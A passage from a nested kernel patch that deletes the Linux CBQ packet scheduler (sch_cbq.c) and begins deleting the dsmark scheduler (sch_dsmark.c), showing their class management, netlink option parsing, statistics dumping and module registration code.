+-	qdisc_class_hash_insert(&q->clhash, &this->common);
+-
+-	if (parent == NULL)
+-		return;
+-
+-	if (parent->children == NULL) {
+-		parent->children = this;
+-	} else {
+-		this->sibling = parent->children->sibling;
+-		parent->children->sibling = this;
+-	}
+-}
+-
+-static void
+-cbq_reset(struct Qdisc *sch)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl;
+-	int prio;
+-	unsigned int h;
+-
+-	q->activemask = 0;
+-	q->pmask = 0;
+-	q->tx_class = NULL;
+-	q->tx_borrowed = NULL;
+-	qdisc_watchdog_cancel(&q->watchdog);
+-	q->toplevel = TC_CBQ_MAXLEVEL;
+-	q->now = psched_get_time();
+-
+-	for (prio = 0; prio <= TC_CBQ_MAXPRIO; prio++)
+-		q->active[prio] = NULL;
+-
+-	for (h = 0; h < q->clhash.hashsize; h++) {
+-		hlist_for_each_entry(cl, &q->clhash.hash[h], common.hnode) {
+-			qdisc_reset(cl->q);
+-
+-			cl->next_alive = NULL;
+-			cl->undertime = PSCHED_PASTPERFECT;
+-			cl->avgidle = cl->maxidle;
+-			cl->deficit = cl->quantum;
+-			cl->cpriority = cl->priority;
+-		}
+-	}
+-}
+-
+-
+-static void cbq_set_lss(struct cbq_class *cl, struct tc_cbq_lssopt *lss)
+-{
+-	if (lss->change & TCF_CBQ_LSS_FLAGS) {
+-		cl->share = (lss->flags & TCF_CBQ_LSS_ISOLATED) ? NULL : cl->tparent;
+-		cl->borrow = (lss->flags & TCF_CBQ_LSS_BOUNDED) ? NULL : cl->tparent;
+-	}
+-	if (lss->change & TCF_CBQ_LSS_EWMA)
+-		cl->ewma_log = lss->ewma_log;
+-	if (lss->change & TCF_CBQ_LSS_AVPKT)
+-		cl->avpkt = lss->avpkt;
+-	if (lss->change & TCF_CBQ_LSS_MINIDLE)
+-		cl->minidle = -(long)lss->minidle;
+-	if (lss->change & TCF_CBQ_LSS_MAXIDLE) {
+-		cl->maxidle = lss->maxidle;
+-		cl->avgidle = lss->maxidle;
+-	}
+-	if (lss->change & TCF_CBQ_LSS_OFFTIME)
+-		cl->offtime = lss->offtime;
+-}
+-
+-static void cbq_rmprio(struct cbq_sched_data *q, struct cbq_class *cl)
+-{
+-	q->nclasses[cl->priority]--;
+-	q->quanta[cl->priority] -= cl->weight;
+-	cbq_normalize_quanta(q, cl->priority);
+-}
+-
+-static void cbq_addprio(struct cbq_sched_data *q, struct cbq_class *cl)
+-{
+-	q->nclasses[cl->priority]++;
+-	q->quanta[cl->priority] += cl->weight;
+-	cbq_normalize_quanta(q, cl->priority);
+-}
+-
+-static int cbq_set_wrr(struct cbq_class *cl, struct tc_cbq_wrropt *wrr)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(cl->qdisc);
+-
+-	if (wrr->allot)
+-		cl->allot = wrr->allot;
+-	if (wrr->weight)
+-		cl->weight = wrr->weight;
+-	if (wrr->priority) {
+-		cl->priority = wrr->priority - 1;
+-		cl->cpriority = cl->priority;
+-		if (cl->priority >= cl->priority2)
+-			cl->priority2 = TC_CBQ_MAXPRIO - 1;
+-	}
+-
+-	cbq_addprio(q, cl);
+-	return 0;
+-}
+-
+-static int cbq_set_fopt(struct cbq_class *cl, struct tc_cbq_fopt *fopt)
+-{
+-	cbq_change_defmap(cl, fopt->split, fopt->defmap, fopt->defchange);
+-	return 0;
+-}
+-
+-static const struct nla_policy cbq_policy[TCA_CBQ_MAX + 1] = {
+-	[TCA_CBQ_LSSOPT]	= { .len = sizeof(struct tc_cbq_lssopt) },
+-	[TCA_CBQ_WRROPT]	= { .len = sizeof(struct tc_cbq_wrropt) },
+-	[TCA_CBQ_FOPT]		= { .len = sizeof(struct tc_cbq_fopt) },
+-	[TCA_CBQ_OVL_STRATEGY]	= { .len = sizeof(struct tc_cbq_ovl) },
+-	[TCA_CBQ_RATE]		= { .len = sizeof(struct tc_ratespec) },
+-	[TCA_CBQ_RTAB]		= { .type = NLA_BINARY, .len = TC_RTAB_SIZE },
+-	[TCA_CBQ_POLICE]	= { .len = sizeof(struct tc_cbq_police) },
+-};
+-
+-static int cbq_opt_parse(struct nlattr *tb[TCA_CBQ_MAX + 1],
+-			 struct nlattr *opt,
+-			 struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	if (!opt) {
+-		NL_SET_ERR_MSG(extack, "CBQ options are required for this operation");
+-		return -EINVAL;
+-	}
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_CBQ_MAX, opt,
+-					  cbq_policy, extack);
+-	if (err < 0)
+-		return err;
+-
+-	if (tb[TCA_CBQ_WRROPT]) {
+-		const struct tc_cbq_wrropt *wrr = nla_data(tb[TCA_CBQ_WRROPT]);
+-
+-		if (wrr->priority > TC_CBQ_MAXPRIO) {
+-			NL_SET_ERR_MSG(extack, "priority is bigger than TC_CBQ_MAXPRIO");
+-			err = -EINVAL;
+-		}
+-	}
+-	return err;
+-}
+-
+-static int cbq_init(struct Qdisc *sch, struct nlattr *opt,
+-		    struct netlink_ext_ack *extack)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct nlattr *tb[TCA_CBQ_MAX + 1];
+-	struct tc_ratespec *r;
+-	int err;
+-
+-	qdisc_watchdog_init(&q->watchdog, sch);
+-
+-	err = cbq_opt_parse(tb, opt, extack);
+-	if (err < 0)
+-		return err;
+-
+-	if (!tb[TCA_CBQ_RTAB] || !tb[TCA_CBQ_RATE]) {
+-		NL_SET_ERR_MSG(extack, "Rate specification missing or incomplete");
+-		return -EINVAL;
+-	}
+-
+-	r = nla_data(tb[TCA_CBQ_RATE]);
+-
+-	q->link.R_tab = qdisc_get_rtab(r, tb[TCA_CBQ_RTAB], extack);
+-	if (!q->link.R_tab)
+-		return -EINVAL;
+-
+-	err = tcf_block_get(&q->link.block, &q->link.filter_list, sch, extack);
+-	if (err)
+-		goto put_rtab;
+-
+-	err = qdisc_class_hash_init(&q->clhash);
+-	if (err < 0)
+-		goto put_block;
+-
+-	q->link.sibling = &q->link;
+-	q->link.common.classid = sch->handle;
+-	q->link.qdisc = sch;
+-	q->link.q = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops,
+-				      sch->handle, NULL);
+-	if (!q->link.q)
+-		q->link.q = &noop_qdisc;
+-	else
+-		qdisc_hash_add(q->link.q, true);
+-
+-	q->link.priority = TC_CBQ_MAXPRIO - 1;
+-	q->link.priority2 = TC_CBQ_MAXPRIO - 1;
+-	q->link.cpriority = TC_CBQ_MAXPRIO - 1;
+-	q->link.allot = psched_mtu(qdisc_dev(sch));
+-	q->link.quantum = q->link.allot;
+-	q->link.weight = q->link.R_tab->rate.rate;
+-
+-	q->link.ewma_log = TC_CBQ_DEF_EWMA;
+-	q->link.avpkt = q->link.allot/2;
+-	q->link.minidle = -0x7FFFFFFF;
+-
+-	q->toplevel = TC_CBQ_MAXLEVEL;
+-	q->now = psched_get_time();
+-
+-	cbq_link_class(&q->link);
+-
+-	if (tb[TCA_CBQ_LSSOPT])
+-		cbq_set_lss(&q->link, nla_data(tb[TCA_CBQ_LSSOPT]));
+-
+-	cbq_addprio(q, &q->link);
+-	return 0;
+-
+-put_block:
+-	tcf_block_put(q->link.block);
+-
+-put_rtab:
+-	qdisc_put_rtab(q->link.R_tab);
+-	return err;
+-}
+-
+-static int cbq_dump_rate(struct sk_buff *skb, struct cbq_class *cl)
+-{
+-	unsigned char *b = skb_tail_pointer(skb);
+-
+-	if (nla_put(skb, TCA_CBQ_RATE, sizeof(cl->R_tab->rate), &cl->R_tab->rate))
+-		goto nla_put_failure;
+-	return skb->len;
+-
+-nla_put_failure:
+-	nlmsg_trim(skb, b);
+-	return -1;
+-}
+-
+-static int cbq_dump_lss(struct sk_buff *skb, struct cbq_class *cl)
+-{
+-	unsigned char *b = skb_tail_pointer(skb);
+-	struct tc_cbq_lssopt opt;
+-
+-	opt.flags = 0;
+-	if (cl->borrow == NULL)
+-		opt.flags |= TCF_CBQ_LSS_BOUNDED;
+-	if (cl->share == NULL)
+-		opt.flags |= TCF_CBQ_LSS_ISOLATED;
+-	opt.ewma_log = cl->ewma_log;
+-	opt.level = cl->level;
+-	opt.avpkt = cl->avpkt;
+-	opt.maxidle = cl->maxidle;
+-	opt.minidle = (u32)(-cl->minidle);
+-	opt.offtime = cl->offtime;
+-	opt.change = ~0;
+-	if (nla_put(skb, TCA_CBQ_LSSOPT, sizeof(opt), &opt))
+-		goto nla_put_failure;
+-	return skb->len;
+-
+-nla_put_failure:
+-	nlmsg_trim(skb, b);
+-	return -1;
+-}
+-
+-static int cbq_dump_wrr(struct sk_buff *skb, struct cbq_class *cl)
+-{
+-	unsigned char *b = skb_tail_pointer(skb);
+-	struct tc_cbq_wrropt opt;
+-
+-	memset(&opt, 0, sizeof(opt));
+-	opt.flags = 0;
+-	opt.allot = cl->allot;
+-	opt.priority = cl->priority + 1;
+-	opt.cpriority = cl->cpriority + 1;
+-	opt.weight = cl->weight;
+-	if (nla_put(skb, TCA_CBQ_WRROPT, sizeof(opt), &opt))
+-		goto nla_put_failure;
+-	return skb->len;
+-
+-nla_put_failure:
+-	nlmsg_trim(skb, b);
+-	return -1;
+-}
+-
+-static int cbq_dump_fopt(struct sk_buff *skb, struct cbq_class *cl)
+-{
+-	unsigned char *b = skb_tail_pointer(skb);
+-	struct tc_cbq_fopt opt;
+-
+-	if (cl->split || cl->defmap) {
+-		opt.split = cl->split ? cl->split->common.classid : 0;
+-		opt.defmap = cl->defmap;
+-		opt.defchange = ~0;
+-		if (nla_put(skb, TCA_CBQ_FOPT, sizeof(opt), &opt))
+-			goto nla_put_failure;
+-	}
+-	return skb->len;
+-
+-nla_put_failure:
+-	nlmsg_trim(skb, b);
+-	return -1;
+-}
+-
+-static int cbq_dump_attr(struct sk_buff *skb, struct cbq_class *cl)
+-{
+-	if (cbq_dump_lss(skb, cl) < 0 ||
+-	    cbq_dump_rate(skb, cl) < 0 ||
+-	    cbq_dump_wrr(skb, cl) < 0 ||
+-	    cbq_dump_fopt(skb, cl) < 0)
+-		return -1;
+-	return 0;
+-}
+-
+-static int cbq_dump(struct Qdisc *sch, struct sk_buff *skb)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct nlattr *nest;
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-	if (cbq_dump_attr(skb, &q->link) < 0)
+-		goto nla_put_failure;
+-	return nla_nest_end(skb, nest);
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-
+-static int
+-cbq_dump_stats(struct Qdisc *sch, struct gnet_dump *d)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-
+-	q->link.xstats.avgidle = q->link.avgidle;
+-	return gnet_stats_copy_app(d, &q->link.xstats, sizeof(q->link.xstats));
+-}
+-
+-static int
+-cbq_dump_class(struct Qdisc *sch, unsigned long arg,
+-	       struct sk_buff *skb, struct tcmsg *tcm)
+-{
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-	struct nlattr *nest;
+-
+-	if (cl->tparent)
+-		tcm->tcm_parent = cl->tparent->common.classid;
+-	else
+-		tcm->tcm_parent = TC_H_ROOT;
+-	tcm->tcm_handle = cl->common.classid;
+-	tcm->tcm_info = cl->q->handle;
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-	if (cbq_dump_attr(skb, cl) < 0)
+-		goto nla_put_failure;
+-	return nla_nest_end(skb, nest);
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-
+-static int
+-cbq_dump_class_stats(struct Qdisc *sch, unsigned long arg,
+-	struct gnet_dump *d)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-	__u32 qlen;
+-
+-	cl->xstats.avgidle = cl->avgidle;
+-	cl->xstats.undertime = 0;
+-	qdisc_qstats_qlen_backlog(cl->q, &qlen, &cl->qstats.backlog);
+-
+-	if (cl->undertime != PSCHED_PASTPERFECT)
+-		cl->xstats.undertime = cl->undertime - q->now;
+-
+-	if (gnet_stats_copy_basic(d, NULL, &cl->bstats, true) < 0 ||
+-	    gnet_stats_copy_rate_est(d, &cl->rate_est) < 0 ||
+-	    gnet_stats_copy_queue(d, NULL, &cl->qstats, qlen) < 0)
+-		return -1;
+-
+-	return gnet_stats_copy_app(d, &cl->xstats, sizeof(cl->xstats));
+-}
+-
+-static int cbq_graft(struct Qdisc *sch, unsigned long arg, struct Qdisc *new,
+-		     struct Qdisc **old, struct netlink_ext_ack *extack)
+-{
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	if (new == NULL) {
+-		new = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops,
+-					cl->common.classid, extack);
+-		if (new == NULL)
+-			return -ENOBUFS;
+-	}
+-
+-	*old = qdisc_replace(sch, new, &cl->q);
+-	return 0;
+-}
+-
+-static struct Qdisc *cbq_leaf(struct Qdisc *sch, unsigned long arg)
+-{
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	return cl->q;
+-}
+-
+-static void cbq_qlen_notify(struct Qdisc *sch, unsigned long arg)
+-{
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	cbq_deactivate_class(cl);
+-}
+-
+-static unsigned long cbq_find(struct Qdisc *sch, u32 classid)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-
+-	return (unsigned long)cbq_class_lookup(q, classid);
+-}
+-
+-static void cbq_destroy_class(struct Qdisc *sch, struct cbq_class *cl)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-
+-	WARN_ON(cl->filters);
+-
+-	tcf_block_put(cl->block);
+-	qdisc_put(cl->q);
+-	qdisc_put_rtab(cl->R_tab);
+-	gen_kill_estimator(&cl->rate_est);
+-	if (cl != &q->link)
+-		kfree(cl);
+-}
+-
+-static void cbq_destroy(struct Qdisc *sch)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct hlist_node *next;
+-	struct cbq_class *cl;
+-	unsigned int h;
+-
+-#ifdef CONFIG_NET_CLS_ACT
+-	q->rx_class = NULL;
+-#endif
+-	/*
+-	 * Filters must be destroyed first because we don't destroy the
+-	 * classes from root to leafs which means that filters can still
+-	 * be bound to classes which have been destroyed already. --TGR '04
+-	 */
+-	for (h = 0; h < q->clhash.hashsize; h++) {
+-		hlist_for_each_entry(cl, &q->clhash.hash[h], common.hnode) {
+-			tcf_block_put(cl->block);
+-			cl->block = NULL;
+-		}
+-	}
+-	for (h = 0; h < q->clhash.hashsize; h++) {
+-		hlist_for_each_entry_safe(cl, next, &q->clhash.hash[h],
+-					  common.hnode)
+-			cbq_destroy_class(sch, cl);
+-	}
+-	qdisc_class_hash_destroy(&q->clhash);
+-}
+-
+-static int
+-cbq_change_class(struct Qdisc *sch, u32 classid, u32 parentid, struct nlattr **tca,
+-		 unsigned long *arg, struct netlink_ext_ack *extack)
+-{
+-	int err;
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl = (struct cbq_class *)*arg;
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_CBQ_MAX + 1];
+-	struct cbq_class *parent;
+-	struct qdisc_rate_table *rtab = NULL;
+-
+-	err = cbq_opt_parse(tb, opt, extack);
+-	if (err < 0)
+-		return err;
+-
+-	if (tb[TCA_CBQ_OVL_STRATEGY] || tb[TCA_CBQ_POLICE]) {
+-		NL_SET_ERR_MSG(extack, "Neither overlimit strategy nor policing attributes can be used for changing class params");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	if (cl) {
+-		/* Check parent */
+-		if (parentid) {
+-			if (cl->tparent &&
+-			    cl->tparent->common.classid != parentid) {
+-				NL_SET_ERR_MSG(extack, "Invalid parent id");
+-				return -EINVAL;
+-			}
+-			if (!cl->tparent && parentid != TC_H_ROOT) {
+-				NL_SET_ERR_MSG(extack, "Parent must be root");
+-				return -EINVAL;
+-			}
+-		}
+-
+-		if (tb[TCA_CBQ_RATE]) {
+-			rtab = qdisc_get_rtab(nla_data(tb[TCA_CBQ_RATE]),
+-					      tb[TCA_CBQ_RTAB], extack);
+-			if (rtab == NULL)
+-				return -EINVAL;
+-		}
+-
+-		if (tca[TCA_RATE]) {
+-			err = gen_replace_estimator(&cl->bstats, NULL,
+-						    &cl->rate_est,
+-						    NULL,
+-						    true,
+-						    tca[TCA_RATE]);
+-			if (err) {
+-				NL_SET_ERR_MSG(extack, "Failed to replace specified rate estimator");
+-				qdisc_put_rtab(rtab);
+-				return err;
+-			}
+-		}
+-
+-		/* Change class parameters */
+-		sch_tree_lock(sch);
+-
+-		if (cl->next_alive != NULL)
+-			cbq_deactivate_class(cl);
+-
+-		if (rtab) {
+-			qdisc_put_rtab(cl->R_tab);
+-			cl->R_tab = rtab;
+-		}
+-
+-		if (tb[TCA_CBQ_LSSOPT])
+-			cbq_set_lss(cl, nla_data(tb[TCA_CBQ_LSSOPT]));
+-
+-		if (tb[TCA_CBQ_WRROPT]) {
+-			cbq_rmprio(q, cl);
+-			cbq_set_wrr(cl, nla_data(tb[TCA_CBQ_WRROPT]));
+-		}
+-
+-		if (tb[TCA_CBQ_FOPT])
+-			cbq_set_fopt(cl, nla_data(tb[TCA_CBQ_FOPT]));
+-
+-		if (cl->q->q.qlen)
+-			cbq_activate_class(cl);
+-
+-		sch_tree_unlock(sch);
+-
+-		return 0;
+-	}
+-
+-	if (parentid == TC_H_ROOT)
+-		return -EINVAL;
+-
+-	if (!tb[TCA_CBQ_WRROPT] || !tb[TCA_CBQ_RATE] || !tb[TCA_CBQ_LSSOPT]) {
+-		NL_SET_ERR_MSG(extack, "One of the following attributes MUST be specified: WRR, rate or link sharing");
+-		return -EINVAL;
+-	}
+-
+-	rtab = qdisc_get_rtab(nla_data(tb[TCA_CBQ_RATE]), tb[TCA_CBQ_RTAB],
+-			      extack);
+-	if (rtab == NULL)
+-		return -EINVAL;
+-
+-	if (classid) {
+-		err = -EINVAL;
+-		if (TC_H_MAJ(classid ^ sch->handle) ||
+-		    cbq_class_lookup(q, classid)) {
+-			NL_SET_ERR_MSG(extack, "Specified class not found");
+-			goto failure;
+-		}
+-	} else {
+-		int i;
+-		classid = TC_H_MAKE(sch->handle, 0x8000);
+-
+-		for (i = 0; i < 0x8000; i++) {
+-			if (++q->hgenerator >= 0x8000)
+-				q->hgenerator = 1;
+-			if (cbq_class_lookup(q, classid|q->hgenerator) == NULL)
+-				break;
+-		}
+-		err = -ENOSR;
+-		if (i >= 0x8000) {
+-			NL_SET_ERR_MSG(extack, "Unable to generate classid");
+-			goto failure;
+-		}
+-		classid = classid|q->hgenerator;
+-	}
+-
+-	parent = &q->link;
+-	if (parentid) {
+-		parent = cbq_class_lookup(q, parentid);
+-		err = -EINVAL;
+-		if (!parent) {
+-			NL_SET_ERR_MSG(extack, "Failed to find parentid");
+-			goto failure;
+-		}
+-	}
+-
+-	err = -ENOBUFS;
+-	cl = kzalloc(sizeof(*cl), GFP_KERNEL);
+-	if (cl == NULL)
+-		goto failure;
+-
+-	gnet_stats_basic_sync_init(&cl->bstats);
+-	err = tcf_block_get(&cl->block, &cl->filter_list, sch, extack);
+-	if (err) {
+-		kfree(cl);
+-		goto failure;
+-	}
+-
+-	if (tca[TCA_RATE]) {
+-		err = gen_new_estimator(&cl->bstats, NULL, &cl->rate_est,
+-					NULL, true, tca[TCA_RATE]);
+-		if (err) {
+-			NL_SET_ERR_MSG(extack, "Couldn't create new estimator");
+-			tcf_block_put(cl->block);
+-			kfree(cl);
+-			goto failure;
+-		}
+-	}
+-
+-	cl->R_tab = rtab;
+-	rtab = NULL;
+-	cl->q = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops, classid,
+-				  NULL);
+-	if (!cl->q)
+-		cl->q = &noop_qdisc;
+-	else
+-		qdisc_hash_add(cl->q, true);
+-
+-	cl->common.classid = classid;
+-	cl->tparent = parent;
+-	cl->qdisc = sch;
+-	cl->allot = parent->allot;
+-	cl->quantum = cl->allot;
+-	cl->weight = cl->R_tab->rate.rate;
+-
+-	sch_tree_lock(sch);
+-	cbq_link_class(cl);
+-	cl->borrow = cl->tparent;
+-	if (cl->tparent != &q->link)
+-		cl->share = cl->tparent;
+-	cbq_adjust_levels(parent);
+-	cl->minidle = -0x7FFFFFFF;
+-	cbq_set_lss(cl, nla_data(tb[TCA_CBQ_LSSOPT]));
+-	cbq_set_wrr(cl, nla_data(tb[TCA_CBQ_WRROPT]));
+-	if (cl->ewma_log == 0)
+-		cl->ewma_log = q->link.ewma_log;
+-	if (cl->maxidle == 0)
+-		cl->maxidle = q->link.maxidle;
+-	if (cl->avpkt == 0)
+-		cl->avpkt = q->link.avpkt;
+-	if (tb[TCA_CBQ_FOPT])
+-		cbq_set_fopt(cl, nla_data(tb[TCA_CBQ_FOPT]));
+-	sch_tree_unlock(sch);
+-
+-	qdisc_class_hash_grow(sch, &q->clhash);
+-
+-	*arg = (unsigned long)cl;
+-	return 0;
+-
+-failure:
+-	qdisc_put_rtab(rtab);
+-	return err;
+-}
+-
+-static int cbq_delete(struct Qdisc *sch, unsigned long arg,
+-		      struct netlink_ext_ack *extack)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	if (cl->filters || cl->children || cl == &q->link)
+-		return -EBUSY;
+-
+-	sch_tree_lock(sch);
+-
+-	qdisc_purge_queue(cl->q);
+-
+-	if (cl->next_alive)
+-		cbq_deactivate_class(cl);
+-
+-	if (q->tx_borrowed == cl)
+-		q->tx_borrowed = q->tx_class;
+-	if (q->tx_class == cl) {
+-		q->tx_class = NULL;
+-		q->tx_borrowed = NULL;
+-	}
+-#ifdef CONFIG_NET_CLS_ACT
+-	if (q->rx_class == cl)
+-		q->rx_class = NULL;
+-#endif
+-
+-	cbq_unlink_class(cl);
+-	cbq_adjust_levels(cl->tparent);
+-	cl->defmap = 0;
+-	cbq_sync_defmap(cl);
+-
+-	cbq_rmprio(q, cl);
+-	sch_tree_unlock(sch);
+-
+-	cbq_destroy_class(sch, cl);
+-	return 0;
+-}
+-
+-static struct tcf_block *cbq_tcf_block(struct Qdisc *sch, unsigned long arg,
+-				       struct netlink_ext_ack *extack)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	if (cl == NULL)
+-		cl = &q->link;
+-
+-	return cl->block;
+-}
+-
+-static unsigned long cbq_bind_filter(struct Qdisc *sch, unsigned long parent,
+-				     u32 classid)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *p = (struct cbq_class *)parent;
+-	struct cbq_class *cl = cbq_class_lookup(q, classid);
+-
+-	if (cl) {
+-		if (p && p->level <= cl->level)
+-			return 0;
+-		cl->filters++;
+-		return (unsigned long)cl;
+-	}
+-	return 0;
+-}
+-
+-static void cbq_unbind_filter(struct Qdisc *sch, unsigned long arg)
+-{
+-	struct cbq_class *cl = (struct cbq_class *)arg;
+-
+-	cl->filters--;
+-}
+-
+-static void cbq_walk(struct Qdisc *sch, struct qdisc_walker *arg)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl;
+-	unsigned int h;
+-
+-	if (arg->stop)
+-		return;
+-
+-	for (h = 0; h < q->clhash.hashsize; h++) {
+-		hlist_for_each_entry(cl, &q->clhash.hash[h], common.hnode) {
+-			if (!tc_qdisc_stats_dump(sch, (unsigned long)cl, arg))
+-				return;
+-		}
+-	}
+-}
+-
+-static const struct Qdisc_class_ops cbq_class_ops = {
+-	.graft		=	cbq_graft,
+-	.leaf		=	cbq_leaf,
+-	.qlen_notify	=	cbq_qlen_notify,
+-	.find		=	cbq_find,
+-	.change		=	cbq_change_class,
+-	.delete		=	cbq_delete,
+-	.walk		=	cbq_walk,
+-	.tcf_block	=	cbq_tcf_block,
+-	.bind_tcf	=	cbq_bind_filter,
+-	.unbind_tcf	=	cbq_unbind_filter,
+-	.dump		=	cbq_dump_class,
+-	.dump_stats	=	cbq_dump_class_stats,
+-};
+-
+-static struct Qdisc_ops cbq_qdisc_ops __read_mostly = {
+-	.next		=	NULL,
+-	.cl_ops		=	&cbq_class_ops,
+-	.id		=	"cbq",
+-	.priv_size	=	sizeof(struct cbq_sched_data),
+-	.enqueue	=	cbq_enqueue,
+-	.dequeue	=	cbq_dequeue,
+-	.peek		=	qdisc_peek_dequeued,
+-	.init		=	cbq_init,
+-	.reset		=	cbq_reset,
+-	.destroy	=	cbq_destroy,
+-	.change		=	NULL,
+-	.dump		=	cbq_dump,
+-	.dump_stats	=	cbq_dump_stats,
+-	.owner		=	THIS_MODULE,
+-};
+-
+-static int __init cbq_module_init(void)
+-{
+-	return register_qdisc(&cbq_qdisc_ops);
+-}
+-static void __exit cbq_module_exit(void)
+-{
+-	unregister_qdisc(&cbq_qdisc_ops);
+-}
+-module_init(cbq_module_init)
+-module_exit(cbq_module_exit)
+-MODULE_LICENSE("GPL");
+diff --git a/net/sched/sch_dsmark.c b/net/sched/sch_dsmark.c
+deleted file mode 100644
+index 401ffaf87d622..0000000000000
+--- a/net/sched/sch_dsmark.c
++++ /dev/null
+@@ -1,518 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/* net/sched/sch_dsmark.c - Differentiated Services field marker */
+-
+-/* Written 1998-2000 by Werner Almesberger, EPFL ICA */
+-
+-
+-#include <linux/module.h>
+-#include <linux/init.h>
+-#include <linux/slab.h>
+-#include <linux/types.h>
+-#include <linux/string.h>
+-#include <linux/errno.h>
+-#include <linux/skbuff.h>
+-#include <linux/rtnetlink.h>
+-#include <linux/bitops.h>
+-#include <net/pkt_sched.h>
+-#include <net/pkt_cls.h>
+-#include <net/dsfield.h>
+-#include <net/inet_ecn.h>
+-#include <asm/byteorder.h>
+-
+-/*
+- * classid	class		marking
+- * -------	-----		-------
+- *   n/a	  0		n/a
+- *   x:0	  1		use entry [0]
+- *   ...	 ...		...
+- *   x:y y>0	 y+1		use entry [y]
+- *   ...	 ...		...
+- * x:indices-1	indices		use entry [indices-1]
+- *   ...	 ...		...
+- *   x:y	 y+1		use entry [y & (indices-1)]
+- *   ...	 ...		...
+- * 0xffff	0x10000		use entry [indices-1]
+- */
+-
+-
+-#define NO_DEFAULT_INDEX	(1 << 16)
+-
+-struct mask_value {
+-	u8			mask;
+-	u8			value;
+-};
+-
+-struct dsmark_qdisc_data {
+-	struct Qdisc		*q;
+-	struct tcf_proto __rcu	*filter_list;
+-	struct tcf_block	*block;
+-	struct mask_value	*mv;
+-	u16			indices;
+-	u8			set_tc_index;
+-	u32			default_index;	/* index range is 0...0xffff */
+-#define DSMARK_EMBEDDED_SZ	16
+-	struct mask_value	embedded[DSMARK_EMBEDDED_SZ];
+-};
+-
+-static inline int dsmark_valid_index(struct dsmark_qdisc_data *p, u16 index)
+-{
+-	return index <= p->indices && index > 0;
+-}
+-
+-/* ------------------------- Class/flow operations ------------------------- */
+-
+-static int dsmark_graft(struct Qdisc *sch, unsigned long arg,
+-			struct Qdisc *new, struct Qdisc **old,
+-			struct netlink_ext_ack *extack)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	pr_debug("%s(sch %p,[qdisc %p],new %p,old %p)\n",
+-		 __func__, sch, p, new, old);
+-
+-	if (new == NULL) {
+-		new = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops,
+-					sch->handle, NULL);
+-		if (new == NULL)
+-			new = &noop_qdisc;
+-	}
+-
+-	*old = qdisc_replace(sch, new, &p->q);
+-	return 0;
+-}
+-
+-static struct Qdisc *dsmark_leaf(struct Qdisc *sch, unsigned long arg)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	return p->q;
+-}
+-
+-static unsigned long dsmark_find(struct Qdisc *sch, u32 classid)
+-{
+-	return TC_H_MIN(classid) + 1;
+-}
+-
+-static unsigned long dsmark_bind_filter(struct Qdisc *sch,
+-					unsigned long parent, u32 classid)
+-{
+-	pr_debug("%s(sch %p,[qdisc %p],classid %x)\n",
+-		 __func__, sch, qdisc_priv(sch), classid);
+-
+-	return dsmark_find(sch, classid);
+-}
+-
+-static void dsmark_unbind_filter(struct Qdisc *sch, unsigned long cl)
+-{
+-}
+-
+-static const struct nla_policy dsmark_policy[TCA_DSMARK_MAX + 1] = {
+-	[TCA_DSMARK_INDICES]		= { .type = NLA_U16 },
+-	[TCA_DSMARK_DEFAULT_INDEX]	= { .type = NLA_U16 },
+-	[TCA_DSMARK_SET_TC_INDEX]	= { .type = NLA_FLAG },
+-	[TCA_DSMARK_MASK]		= { .type = NLA_U8 },
+-	[TCA_DSMARK_VALUE]		= { .type = NLA_U8 },
+-};
+-
+-static int dsmark_change(struct Qdisc *sch, u32 classid, u32 parent,
+-			 struct nlattr **tca, unsigned long *arg,
+-			 struct netlink_ext_ack *extack)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_DSMARK_MAX + 1];
+-	int err = -EINVAL;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],classid %x,parent %x), arg 0x%lx\n",
+-		 __func__, sch, p, classid, parent, *arg);
+-
+-	if (!dsmark_valid_index(p, *arg)) {
+-		err = -ENOENT;
+-		goto errout;
+-	}
+-
+-	if (!opt)
+-		goto errout;
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_DSMARK_MAX, opt,
